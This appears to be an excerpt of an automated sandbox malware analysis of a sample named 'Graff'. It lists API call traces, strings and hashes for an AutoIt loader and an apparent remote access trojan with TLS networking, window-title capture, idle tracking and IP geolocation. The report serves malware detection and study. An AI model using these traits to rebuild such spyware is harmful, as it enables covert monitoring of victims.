SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049

Strings

@CG, xrefs: 00409F24
xAG, xrefs: 00409E93
XCG, xrefs: 00409ECE
@CG, xrefs: 00409F19
xAG, xrefs: 00409E83
XCG, xrefs: 0040A029

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: @CG$@CG$XCG$XCG$xAG$xAG
API String ID: 3795512280-3163867910
Opcode ID: 542ffdb9ba199d739160300b33626b0e5c1b5e92a905c689216b00d5afaceaf0
Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
Opcode Fuzzy Hash: 542ffdb9ba199d739160300b33626b0e5c1b5e92a905c689216b00d5afaceaf0
Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

Function 0040428C Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 147
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32(?,015B9780,00000010), ref: 004042A5
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

Strings

Connection Refused, xrefs: 0040443E
TLS Error 2, xrefs: 0040431A
TLS Error 3, xrefs: 0040439D
TLS Authentication Failed, xrefs: 0040435E
TLS Handshake... | , xrefs: 004042C9
TLS Error 1, xrefs: 004042FC
Connection Failed: , xrefs: 0040440C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
API String ID: 994465650-2151626615
Opcode ID: 0c89bf3760f2a1965d3c0a2191cfd47cf2acd1ef0e11d22d5915d639caeea408
Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
Opcode Fuzzy Hash: 0c89bf3760f2a1965d3c0a2191cfd47cf2acd1ef0e11d22d5915d639caeea408
Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
closesocket.WS2_32(000000FF), ref: 0040481F
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$ObjectSingleWait$closesocket
String ID:
API String ID: 3658366068-0
Opcode ID: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
Opcode Fuzzy Hash: c0811b9552baa960996580efd3a95ddbe219791cb6e29288b5199f5b52bda897
Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

Function 0087344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00873A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,0087351C,?,?,?,?,0087106A,-00940FC4), ref: 00873A78

Part of subcall function 00873357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00873527,?,?,?,?,0087106A,-00940FC4), ref: 00873379

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,0087106A,-00940FC4), ref: 0087356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,0087106A,-00940FC4), ref: 008B318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,?,?,0087106A,-00940FC4), ref: 008B31CE
RegCloseKey.ADVAPI32(?,?,?,?,?,0087106A,-00940FC4), ref: 008B3210
_wcslen.LIBCMT ref: 008B3277
_wcslen.LIBCMT ref: 008B3286

Strings

Include, xrefs: 008B3184, 008B31C5
\, xrefs: 008B328C
Software\AutoIt v3\AutoIt, xrefs: 00873560
\Include\, xrefs: 00873527

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 0b87a4eadee2f9d2d81820f314cf229542befeebfb25f3a7388126a8905a75c9
Instruction ID: 676e61a8f56d4f09b69bd680f83fa3bbf9fb92476a7ea47037574a0126793a99
Opcode Fuzzy Hash: 0b87a4eadee2f9d2d81820f314cf229542befeebfb25f3a7388126a8905a75c9
Instruction Fuzzy Hash: EA715A714183009EC714EF69D882D9ABBF8FF96B40B80452EF559C62A5EB309A48DB52

Function 0040A3F4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 158
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__Init_thread_footer.LIBCMT ref: 0040A456
Sleep.KERNEL32(000001F4), ref: 0040A461
GetForegroundWindow.USER32 ref: 0040A467
GetWindowTextLengthW.USER32(00000000), ref: 0040A470
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
Sleep.KERNEL32(000003E8), ref: 0040A574

Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84

Strings

[, xrefs: 0040A50E
minutes }, xrefs: 0040A59F
], xrefs: 0040A508
{ User has been idle for , xrefs: 0040A5AB

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for $ minutes }$]
API String ID: 911427763-3954389425
Opcode ID: 3c6ee92d84359104ee0573254cf12a691697071f0581e92b2c3421999a9350c5
Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
Opcode Fuzzy Hash: 3c6ee92d84359104ee0573254cf12a691697071f0581e92b2c3421999a9350c5
Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04

Strings

UserProfile, xrefs: 0040C9C2
ProgramData, xrefs: 0040C9C9
WinDir, xrefs: 0040C905, 0040C927, 0040C979
ProgramFiles, xrefs: 0040C9D8
AppData, xrefs: 0040C9BB
SystemDrive, xrefs: 0040C8FB
\system32, xrefs: 0040C918
Temp, xrefs: 0040C8D0
\SysWOW64, xrefs: 0040C96A

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: aab0cbfc32142aedbd5b5918db314a4c0bfd4b7dc14f97a5e9857690b268a3e0
Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
Opcode Fuzzy Hash: aab0cbfc32142aedbd5b5918db314a4c0bfd4b7dc14f97a5e9857690b268a3e0
Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

Function 00872B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00872B8E
LoadCursorW.USER32(00000000,00007F00), ref: 00872B9D
LoadIconW.USER32(00000063), ref: 00872BB3
LoadIconW.USER32(000000A4), ref: 00872BC5
LoadIconW.USER32(000000A2), ref: 00872BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00872BEF
RegisterClassExW.USER32(?), ref: 00872C40

Part of subcall function 00872CD4: GetSysColorBrush.USER32(0000000F), ref: 00872D07
Part of subcall function 00872CD4: RegisterClassExW.USER32(00000030), ref: 00872D31
Part of subcall function 00872CD4: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00872D42
Part of subcall function 00872CD4: LoadIconW.USER32(000000A9), ref: 00872D85

Strings

AutoIt v3, xrefs: 00872C2F
0, xrefs: 00872C0F
#, xrefs: 00872C16

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
String ID: #$0$AutoIt v3
API String ID: 2880975755-4155596026
Opcode ID: ccf129aeda272b0232e2cf735d9137dba7abb6653c2df662141d269ea27e1f74
Instruction ID: 418ca51248d2d65c0816058c7c9785c0c344740950db12fc806f839944f2c2ce
Opcode Fuzzy Hash: ccf129aeda272b0232e2cf735d9137dba7abb6653c2df662141d269ea27e1f74
Instruction Fuzzy Hash: 82216FB8E68314AFDB109FA5EC45F9D7FB4FB49B50F00411AF500A66A0D3B14580EF90

Function 00872CD4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00872D07
RegisterClassExW.USER32(00000030), ref: 00872D31
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00872D42
LoadIconW.USER32(000000A9), ref: 00872D85

Strings

+, xrefs: 00872CF0
TaskbarCreated, xrefs: 00872D37
AutoIt v3 GUI, xrefs: 00872D23
0, xrefs: 00872CE9

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Register$BrushClassClipboardColorFormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 975902462-1005189915
Opcode ID: 9c921c6be5754fd4e98b61acdd268325e818564fd24d9eaebd6dbcdc1a656d46
Instruction ID: da36a18d3fd6056311643659deb8ddc8b8d537502774ab10a4d6d0dcb9b85620
Opcode Fuzzy Hash: 9c921c6be5754fd4e98b61acdd268325e818564fd24d9eaebd6dbcdc1a656d46
Instruction Fuzzy Hash: D921C4B9965318AFDB00DFA4EC49BDDBBB4FB09704F00821AF511A62A0D7B14584EF91

Function 0089043D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

___scrt_release_startup_lock.LIBCMT ref: 0089048D
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 008904A1
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 008904C7
___scrt_uninitialize_crt.LIBCMT ref: 0089050A

Strings

PWh, xrefs: 008904E7
H, xrefs: 00890502

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
String ID: PWh$H
API String ID: 3089971210-1294464006
Opcode ID: a9d7f2beac33610286271e44be96552bcf3f3db3a03c42aa7a82f094e564bc8d
Instruction ID: 41f167d7934153710f5d1ca0d1e27963aac13b1d35913d8b900091095e62bf43
Opcode Fuzzy Hash: a9d7f2beac33610286271e44be96552bcf3f3db3a03c42aa7a82f094e564bc8d
Instruction Fuzzy Hash: CB11E7321447019EEE347B6CA806B2D2790FFC2738F284629F995F75C2DE658C419E5A

Function 0041A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
InternetCloseHandle.WININET(00000000), ref: 0041A5B3
InternetCloseHandle.WININET(00000000), ref: 0041A5B6

Strings

http://geoplugin.net/json.gp, xrefs: 0041A54E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 17fc0088c38be727aafe1e6b1712f5e8588fc0a6e38d46d0469e4f8c7434f41f
Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
Opcode Fuzzy Hash: 17fc0088c38be727aafe1e6b1712f5e8588fc0a6e38d46d0469e4f8c7434f41f
Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6

Function 008742A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008742B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 008742C9
LoadResource.KERNEL32(?,00000000), ref: 008B35BE
SizeofResource.KERNEL32(?,00000000), ref: 008B35D3
LockResource.KERNEL32(?), ref: 008B35E6

Strings

SCRIPT, xrefs: 008742BF

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 7e45ec8ae874fc1247f597907678fff5ac139e7c156fc7ed2705fb1b25990d04
Instruction ID: 4c6918db9129075fe604bb72038c30bf5fe20d5a85500280641d9aee7aaa56e7
Opcode Fuzzy Hash: 7e45ec8ae874fc1247f597907678fff5ac139e7c156fc7ed2705fb1b25990d04
Instruction Fuzzy Hash: 61118EB0214701BFD7218B69DC48F677BBDFBC5B51F208269F416D6690DBB2DC10AA20

Function 0041A463 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173

Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F

StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9

Strings

(32 bit), xrefs: 0041A501
CurrentBuildNumber, xrefs: 0041A4BA
ProductName, xrefs: 0041A472
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0041A477, 0041A481, 0041A4BF
(64 bit), xrefs: 0041A506, 0041A510

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 782494840-2070987746
Opcode ID: 217578d0815a1c9edf06171b6841113b61ca742fee24700dbc17d005330a27bc
Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
Opcode Fuzzy Hash: 217578d0815a1c9edf06171b6841113b61ca742fee24700dbc17d005330a27bc
Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

Function 00872C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00872C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00872CB2
ShowWindow.USER32(00000000,?,?,00872B2F), ref: 00872CC6
ShowWindow.USER32(00000000,?,?,00872B2F), ref: 00872CCF

Strings

AutoIt v3, xrefs: 00872C89, 00872C8E, 00872C8F
edit, xrefs: 00872CAC

Memory Dump Source

Source File: 00000002.00000002.3737593649.0000000000871000.00000040.00000001.01000000.00000004.sdmp, Offset: 00870000, based on PE: true

Associated: 00000002.00000002.3737547117.0000000000870000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.0000000000932000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000093C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.000000000095C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3737593649.00000000009DC000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738202698.00000000009E2000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009E3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009ED000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.3738243500.00000000009FB000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_870000_Graff.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: be347a593a27b997748aa1844ddfd38ec4af7510b505a00928bfc4c616361b03
Instruction ID: fc4a20fa60241a8985c4099bed23a1498bde036a11b7f5ccda371eb209a1fe54
Opcode Fuzzy Hash: be347a593a27b997748aa1844ddfd38ec4af7510b505a00928bfc4c616361b03
Instruction Fuzzy Hash: 89F0DAB95642907EEB311B17AC48E772EBDD7C7F50B00005AF900A25A0C6611894EAB0

Function 1000C7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860

Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE

Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10

Strings

`AG, xrefs: 00409DC2

Memory Dump Source

